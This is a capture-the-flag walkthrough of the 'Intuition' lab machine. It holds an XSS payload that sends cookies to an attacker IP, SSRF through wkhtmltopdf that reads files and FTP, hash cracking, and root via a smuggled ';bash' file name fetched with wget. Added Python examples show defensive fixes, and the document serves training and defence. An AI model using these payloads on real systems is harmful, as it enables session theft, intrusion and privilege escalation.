TCP Scan

> TARGET=10.129.54.182 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://comprezzor.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
  • add the domain to /etc/hosts
echo '10.129.54.182    comprezzor.htb' >> /etc/hosts

web enum

wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://comprezzor.htb/" -H "Host: FUZZ.comprezzor.htb" --hl 107
* /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt

000000291:   302        5 L      22 W       199 Ch      "auth"
000000485:   200        108 L    299 W      3166 Ch     "report"
000000516:   302        5 L      22 W       251 Ch      "dashboard"

auth.comprezzor.htb    report.comprezzor.htb    dashboard.comprezzor.htb

report.comprezzor.htb

  • browse to report.comprezzor.htb; it has a report_bug function
  • register an account and log in to use the bug report function
  • send a bug report with the following payload and set up a listener to catch the callback
# <img src=x onerror=fetch("http://10.10.14.121/?test2="+document.cookie)>
report_title=test&description=%3Cimg+src%3Dx+onerror%3Dfetch%28%22http%3A%2F%2F10.10.14.121%2F%3Ftest2%3D%22%2Bdocument.cookie%29%3E

10.129.54.182 - - [28/Apr/2024 18:42:32] "GET /test?user_data=eyJ1c2VyX2lkIjogMiwgInVzZXJuYW1lIjogImFkYW0iLCAicm9sZSI6ICJ3ZWJkZXYifXw1OGY2ZjcyNTMzOWNlM2Y2OWQ4NTUyYTEwNjk2ZGRlYmI2OGIyYjU3ZDJlNTIzYzA4YmRlODY4ZDNhNzU2ZGI4 HTTP/1.1"
  • browse to dashboard.comprezzor.htb
  • this is the cookie of the user who viewed the report (adam, role webdev); base64 decode it
{"user_id": 2, "username": "adam", "role": "webdev"}|58f6f725339ce3f69d8552a10696ddebb68b2b57d2e523c08bde868d3a756db8
  • browse to the submitted ticket and set its priority to high; the admin will then read the ticket and the callback returns the admin cookie
eyJ1c2VyX2lkIjogMSwgInVzZXJuYW1lIjogImFkbWluIiwgInJvbGUiOiAiYWRtaW4ifXwzNDgyMjMzM2Q0NDRhZTBlNDAyMmY2Y2M2NzlhYzlkMjZkMWQxZDY4MmM1OWM2MWNmYmVhMjlkNzc2ZDU4OWQ5
curl -H "cookie: user_data=cookie" http://dashboard.comprezzor.htb/create_pdf_report -d "report_url=http://10.10.14.121:8888/" -o-

found wkhtmltopdf 0.12.6 in the pdf report
python3 ../pserver.py 8888
INFO:root:Starting httpd...

INFO:root:GET request,
Path: /index.html
Headers:
Accept-Encoding: identity
Host: 10.10.14.121:8888
User-Agent: Python-urllib/3.11
Cookie: user_data=cookie
Connection: close
  • so simply inserting a space before a payload such as file:///etc/passwd bypasses the URL check and gives arbitrary file read through the generated PDF
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
avahi:x:105:110:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
geoclue:x:106:111::/var/lib/geoclue:/usr/sbin/nologin

# file:///proc/self/cmdline
python3/app/code/app.py

# file:///app/code/app.py
from flask import Flask, request, redirect
from blueprints.index.index import main_bp
from blueprints.report.report import report_bp
from blueprints.auth.auth import auth_bp
from blueprints.dashboard.dashboard import dashboard_bp

app = Flask(__name__)
app.secret_key = "7ASS7ADA8RF3FD7"
app.config['SERVER_NAME'] = 'comprezzor.htb'
app.config['MAX_CONTENT_LENGTH'] = 5 * 1024 * 1024  # Limit file size to 5MB
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'docx'}  # Add more allowed file extensions if needed

app.register_blueprint(main_bp)
app.register_blueprint(report_bp, subdomain='report')
app.register_blueprint(auth_bp, subdomain='auth')
app.register_blueprint(dashboard_bp, subdomain='dashboard')

if __name__ == '__main__':
    app.run(debug=False, host="0.0.0.0", port=80)

# file:///app/code/blueprints/dashboard/dashboard.py
ftp = FTP('ftp.local')
ftp.login(user='ftp_admin', passwd='u3jai8y71s2')
ftp.cwd('/')

# file:///app/code/blueprints/auth/auth_utils.py
there is a sqlite3 db called users.db
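A defensive validator for the report_url value that create_pdf_report hands to wkhtmltopdf, added here as an example and not taken from the app's source; is_safe_report_url and DENIED_HOST_SUFFIXES are assumed names, the weak check the write-up bypassed is not on the page, and DNS resolution of non-literal hosts is left as a comment so the block runs offline.

```python
import ipaddress
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
# Assumption: names the PDF worker must never fetch. ftp.local and localhost come
# from the page; extend with whatever internal zones the deployment uses.
DENIED_HOST_SUFFIXES = ("localhost", ".local")


def is_safe_report_url(raw_url):
    """Return True only for an absolute http(s) URL to a public host.

    The URL is parsed after stripping whitespace, so ' file:///etc/passwd'
    and 'ftp://user:pass@ftp.local/...' are rejected regardless of padding
    or letter case in the scheme."""
    parts = urlparse(raw_url.strip())
    if parts.scheme not in ALLOWED_SCHEMES:          # urlparse lowercases the scheme
        return False
    if parts.username is not None or parts.password is not None:
        return False                                 # no embedded credentials
    host = (parts.hostname or "").lower()
    if not host or host.endswith(DENIED_HOST_SUFFIXES):
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name: in production resolve it here, re-check the address with
        # the same is_global test and connect to that address (DNS rebinding).
        return True
    return ip.is_global                              # drops 127/8, 10/8, 172.16/12, 169.254/16


if __name__ == "__main__":
    for u in (" file:///etc/passwd", "ftp://ftp_admin:u3jai8y71s2@ftp.local/",
              "http://127.0.0.1:4444/", "https://example.com/report"):
        print(repr(u), "->", is_safe_report_url(u))
```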

ftp.local

  • use the same create_pdf_report url and connect to ftp
# ftp://ftp_admin:u3jai8y71s2@ftp.local
-rw------- 1 root root 2655 Apr 29 01:45 private-8297.key
-rw-r--r-- 1 root root 15519 Apr 29 01:45 welcome_note.pdf
-rw-r--r-- 1 root root 1732 Apr 29 01:45 welcome_note.txt

# ftp://ftp_admin:u3jai8y71s2@ftp.local/private-8297.key
get the private key

# ftp://ftp_admin:u3jai8y71s2@ftp.local/welcome_note.txt
Dear Devs, We are thrilled to extend a warm welcome to you as you embark on this exciting journey with us. Your
arrival marks the beginning of an inspiring chapter in our collective pursuit of excellence, and we are genuinely
delighted to have you on board. Here, we value talent, innovation, and teamwork, and your presence here reaffirms our
commitment to nurturing a diverse and dynamic workforce. Your skills, experience, and unique perspectives are
invaluable assets that will contribute significantly to our continued growth and success. As you settle into your new
role, please know that you have our unwavering support. Our team is here to guide and assist you every step of the way,
ensuring that you have the resources and knowledge necessary to thrive in your position. To facilitate your work and
access to our systems, we have attached an SSH private key to this email. You can use the following passphrase to
access it, `Y27SH19HDIWD`. Please ensure the utmost confidentiality and security when using this key. If you have any
questions or require assistance with server access or any other aspect of your work, please do not hesitate to reach out
for assistance. In addition to your technical skills, we encourage you to bring your passion, creativity, and innovative
thinking to the table. Your contributions will play a vital role in shaping the future of our projects and products. Once
again, welcome to your new family. We look forward to getting to know you, collaborating with you, and witnessing
your exceptional contributions. Together, we will continue to achieve great things. If you have any questions or need
further information, please feel free to me at adam@comprezzor.htb. Best regards, Adam
  • strip the passphrase (Y27SH19HDIWD, from the welcome note) from the downloaded private key so it can be used directly
> ssh-keygen -p -N "" -m pem -f private-8297.key
Enter old passphrase:
Key has comment 'dev_acc@local'
Your identification has been saved with the new passphrase.
  • access the target to get user flag
ssh -i private-8297.key dev_acc@comprezzor.htb
dev_acc@intuition:~$ ls
user.txt
dev_acc@intuition:~$ cat user.txt
13c44b4b6263a2fbc5ed139142834394
dev_acc@intuition:~$

pe

  • search for the previously found users.db file
dev_acc@intuition:~$ find / -type f -name users.db 2>/dev/null
/var/www/app/blueprints/auth/users.db
  • download it locally and crack the hashes it contains (Werkzeug sha256$salt$hash format)
sha256$nypGJ02XBnkIQK71$f0e11dc8ad21242b550cc8a3c27baaf1022b6522afaadbfa92bd612513e9b606
sha256$Z7bcBO9P43gvdQWp$a67ea5f8722e69ee99258f208dc56a1d5d631f287106003595087cf42189fc43

> hashcat.exe -m 30120 hash.txt rockyou.txt
sha256$Z7bcBO9P43gvdQWp$a67ea5f8722e69ee99258f208dc56a1d5d631f287106003595087cf42189fc43:adam gray
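Why the users.db hashes fall so quickly, and what the fix looks like, as an added example that is not code from the app: the assumption (matching what hashcat mode 30120 targets) is that Werkzeug's legacy "sha256" method is one HMAC-SHA256 over the password keyed with the salt, while the pbkdf2_hash/verify_pbkdf2 names and the iteration count are this example's own.

```python
import hashlib
import hmac
import secrets


def parse_werkzeug_hash(stored):
    """Split Werkzeug's 'method$salt$digest' string into its three parts."""
    method, salt, digest = stored.split("$", 2)
    return method, salt, digest


def legacy_hash(password, salt, method="sha256"):
    # Assumption: the pre-3.0 Werkzeug scheme that hashcat mode 30120 targets,
    # a single HMAC over the password keyed with the salt. One HMAC per guess is
    # why a rockyou run against it finishes in seconds.
    return hmac.new(salt.encode(), password.encode(), method).hexdigest()


def verify_legacy(password, stored):
    method, salt, digest = parse_werkzeug_hash(stored)
    return hmac.compare_digest(legacy_hash(password, salt, method), digest)


def crack_with_wordlist(stored, words):
    """Return the first candidate that reproduces the stored digest, else None."""
    for word in words:
        if verify_legacy(word, stored):
            return word
    return None


def pbkdf2_hash(password, salt=None, iterations=600_000):
    """The replacement: Werkzeug-style 'pbkdf2:sha256:<iter>$salt$digest'."""
    salt = salt or secrets.token_urlsafe(12)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return f"pbkdf2:sha256:{iterations}${salt}${dk.hex()}"


def verify_pbkdf2(password, stored):
    method, salt, digest = parse_werkzeug_hash(stored)
    iterations = int(method.split(":")[2])
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return hmac.compare_digest(dk.hex(), digest)


if __name__ == "__main__":
    # Hash copied from the page's users.db; hashcat reported the plaintext "adam gray".
    page_hash = "sha256$Z7bcBO9P43gvdQWp$a67ea5f8722e69ee99258f208dc56a1d5d631f287106003595087cf42189fc43"
    print("legacy crack:", crack_with_wordlist(page_hash, ["password", "adam gray"]))
    print("upgraded:", pbkdf2_hash("adam gray"))
```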
  • log in to ftp as adam
dev_acc@intuition:~$ ftp localhost
Connected to localhost.
220 pyftpdlib 1.5.7 ready.
Name (localhost:dev_acc): adam
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering extended passive mode (|||39073|).
125 Data connection already open. Transfer starting.
drwxr-xr-x   3 root     1002         4096 Apr 10 08:21 backup
226 Transfer complete.
ftp> cd backup
250 "/backup" is the current directory.
ftp> ls
229 Entering extended passive mode (|||32967|).
150 File status okay. About to open data connection.
drwxr-xr-x   2 root     1002         4096 Apr 10 08:21 runner1
226 Transfer complete.
ftp> cd runner1
250 "/backup/runner1" is the current directory.
ftp> ls
229 Entering extended passive mode (|||39347|).
150 File status okay. About to open data connection.
-rwxr-xr-x   1 root     1002          318 Apr 06 00:25 run-tests.sh
-rwxr-xr-x   1 root     1002        16744 Oct 19  2023 runner1
-rw-r--r--   1 root     1002         3815 Oct 19  2023 runner1.c
226 Transfer complete.
ftp> get run-tests.sh
ftp> get runner1.c
ftp> get runner1
  • files
#!/bin/bash

# List playbooks
./runner1 list

# Run playbooks [Need authentication]
# ./runner run [playbook number] -a [auth code]
#./runner1 run 1 -a "UHI75GHI****"

# Install roles [Need authentication]
# ./runner install [role url] -a [auth code]
#./runner1 install http://role.host.tld/role.tar -a "UHI75GHI****"
  • from runner1.c lines 13 and 24
#define AUTH_KEY_HASH "0feda17076d793c2ef2870d7427ad4ed"
...
if (strcmp(md5_str, AUTH_KEY_HASH) == 0) {
  • crack the hash
> hashcat.exe hash.txt -a 3 -m 0 -1 ?l?u?d?s UHI75GHI?1?1?1?1
0feda17076d793c2ef2870d7427ad4ed:UHI75GHINKOP

./runner1 install http://role.host.tld/role.tar -a "UHI75GHINKOP"
  • local enum
2024/04/29 02:50:20 CMD: UID=0    PID=2013   | python3 /ftp/server.py
2024/04/29 02:50:20 CMD: UID=1200 PID=1916   | python3 -m websockify --web /opt/bin/noVNC 7900 localhost:5900
2024/04/29 04:00:01 CMD: UID=0    PID=88146  | /bin/sh /root/scripts/cleanup/cleanup.sh
2024/04/29 04:00:01 CMD: UID=0    PID=88148  | /usr/bin/cp -r /root/scripts/cleanup/ftp_admin/private-8297.key /root/scripts/cleanup/ftp_admin/welcome_note.pdf /root/scripts/cleanup/ftp_admin/welcome_note.txt /opt/ftp/ftp_admin/

[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:21            0.0.0.0:*               LISTEN      -
tcp        0      0 172.21.0.1:21           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:4444          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:33791         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -

Found lib_mysqludf_sys.so:
If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');
  • in the admin dashboard there is a backup feature: create a backup, quickly log in to ftp as ftp_admin and fetch the backup file before it is deleted
ftp> ls
229 Entering extended passive mode (|||46617|).
125 Data connection already open. Transfer starting.
-rw-r--r--   1 root     root        53224 Apr 29 03:40 app_backup_20240429034044.zip
-rw-------   1 root     root         2655 Apr 29 03:40 private-8297.key
-rw-r--r--   1 root     root        15519 Apr 29 03:40 welcome_note.pdf
-rw-r--r--   1 root     root         1732 Apr 29 03:40 welcome_note.txt
226 Transfer complete.
ftp> get app_backup_20240429034044.zip
local: app_backup_20240429034044.zip remote: app_backup_20240429034044.zip
dev_acc@intuition:~$ find / -type f -user lopez 2>/dev/null
/etc/ansible/roles/kavi.tar/meta/main.yml
/usr/share/ansible/roles/kavi.tar/meta/main.yml
  • check recently changed files
find / -type f -newermt '2024-04-01' -not -path "/usr/*" -not -path "/sys/*" -not -path "/proc/*" -not -path "/run/*" -not -path "/boot/*" -not -path "/var/lib/*" -ls 2>/dev/null
  • check log files
dev_acc@intuition:~$ zgrep -i lopez /var/log/suricata/*.gz
/var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:43:36.099184+0000","flow_id":1988487100549589,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":37522,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":1,"community_id":"1:SLaZvboBWDjwD/SXu/SOOcdHzV8=","ftp":{"command":"USER","command_data":"lopez","completion_code":["331"],"reply":["Username ok, send password."],"reply_received":"yes"}}
/var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:43:52.999165+0000","flow_id":1988487100549589,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":37522,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":2,"community_id":"1:SLaZvboBWDjwD/SXu/SOOcdHzV8=","ftp":{"command":"PASS","command_data":"Lopezzz1992%123","completion_code":["530"],"reply":["Authentication failed."],"reply_received":"yes"}}
/var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:44:32.133372+0000","flow_id":1218304978677234,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":45760,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":1,"community_id":"1:hzLyTSoEJFiGcXoVyvk2lbJlaF0=","ftp":{"command":"USER","command_data":"lopez","completion_code":["331"],"reply":["Username ok, send password."],"reply_received":"yes"}}
/var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:44:48.188361+0000","flow_id":1218304978677234,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":45760,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":2,"community_id":"1:hzLyTSoEJFiGcXoVyvk2lbJlaF0=","ftp":{"command":"PASS","command_data":"Lopezz1992%123","completion_code":["230"],"reply":["Login successful."],"reply_received":"yes"}}

ftp_admin:u3jai8y71s2 lopez:Lopezz1992%123

  • check sudo
lopez@intuition:~$ sudo -l
[sudo] password for lopez:
Matching Defaults entries for lopez on intuition:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User lopez may run the following commands on intuition:
    (ALL : ALL) /opt/runner2/runner2
  • enum
/opt/playbooks/inventory.ini
[local]
127.0.0.1
127.0.0.1 ansible_ssh_user=root ansible_ssh_private_key_file=/root/keys/private.key

[docker_web_servers]
172.21.0.2

/opt/playbooks/apt_update.yml
---
- name: Update and Upgrade APT Packages test
  hosts: local
  become: yes
  tasks:
    - name: Update APT Cache
      apt:
        update_cache: yes
      when: ansible_distribution == 'Debian' or ansible_distribution == 'Ubuntu'

    - name: Upgrade APT Packages
      apt:
        upgrade: dist
        update_cache: yes
      when: ansible_distribution == 'Debian' or ansible_distribution == 'Ubuntu'
{"run":{"action":"install","role_file":"exploit.tar.gz;bash"},"auth_code":"UHI75GHINKOP"}
  • fetch the tar.gz and the json onto the box, then run runner2 on the json
lopez@intuition:~$ wget http://10.10.14.121/exploit.json -O exploit.json && wget http://10.10.14.121/exploit.tar.gz -O 'exploit.tar.gz;bash' && sudo /opt/runner2/runner2 exploit.json
--2024-04-29 10:15:40--  http://10.10.14.121/exploit.json
Connecting to 10.10.14.121:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 89 [application/json]
Saving to: ‘exploit.json’

exploit.json                              100%[====================================================================================>]      89  --.-KB/s    in 0s

2024-04-29 10:15:40 (7.00 MB/s) - ‘exploit.json’ saved [89/89]

--2024-04-29 10:15:40--  http://10.10.14.121/exploit.tar.gz
Connecting to 10.10.14.121:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13787 (13K) [application/gzip]
Saving to: ‘exploit.tar.gz;bash’

exploit.tar.gz;bash                       100%[====================================================================================>]  13.46K  58.7KB/s    in 0.2s

2024-04-29 10:15:41 (58.7 KB/s) - ‘exploit.tar.gz;bash’ saved [13787/13787]

Starting galaxy role install process
- exploit.tar.gz is already installed, skipping.
root@intuition:/home/lopez# id
uid=0(root) gid=0(root) groups=0(root)
root@intuition:/home/lopez# cat /root/root.txt
3de0191f22527e88604dac5007d232a0
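How runner2's input should have been handled, as an added example rather than the runner's code: it reads the same JSON shape as exploit.json above, checks the auth code in constant time, restricts role_file to a bare archive name inside an assumed ROLE_DIR, and builds an argv list for ansible-galaxy so no shell ever sees the name; md5_hex, build_install_argv and handle_request are this example's own names.

```python
import hashlib
import hmac
import json
import os
import re

# Assumptions for this example (not runner2's real code): role archives live in ROLE_DIR
# and role_file must be a bare file name such as "kavi.tar" or "role.tar.gz".
ROLE_DIR = os.path.realpath("/opt/playbooks/roles")
ROLE_NAME_RE = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]*\.tar(\.gz)?")
ACTIONS = {"list", "install"}          # "run" omitted to keep the example short


def md5_hex(code):
    return hashlib.md5(code.encode()).hexdigest()


def check_auth_code(code, auth_key_hash):
    """Constant-time compare of the code's MD5 against the stored hash.
    MD5 is kept only to match runner1.c; the page shows a 12-character code with a
    known 8-character prefix falling to a mask attack, so the real fix is a long,
    fully random code (and a slow salted hash if it has to be stored hashed)."""
    return hmac.compare_digest(md5_hex(code), auth_key_hash)


def build_install_argv(role_file):
    """Return argv for ansible-galaxy; never interpolate role_file into a shell string."""
    if not ROLE_NAME_RE.fullmatch(role_file):
        raise ValueError("role_file must be a bare .tar/.tar.gz file name")
    path = os.path.realpath(os.path.join(ROLE_DIR, role_file))
    if not path.startswith(ROLE_DIR + os.sep):
        raise ValueError("role_file escapes the role directory")
    # subprocess.run(argv) without shell=True passes path as one argument, so a ';'
    # or '|' in the name could not start a second command even if the regex let it in.
    return ["ansible-galaxy", "role", "install", path]


def handle_request(raw_json, auth_key_hash):
    """Parse the JSON shape shown on the page and return the argv to execute."""
    req = json.loads(raw_json)
    if not check_auth_code(str(req.get("auth_code", "")), auth_key_hash):
        raise PermissionError("bad auth code")
    run = req.get("run") or {}
    action = run.get("action")
    if action not in ACTIONS:
        raise ValueError("unknown action")
    if action == "list":
        return ["ansible-galaxy", "role", "list"]
    return build_install_argv(str(run.get("role_file", "")))
```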

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack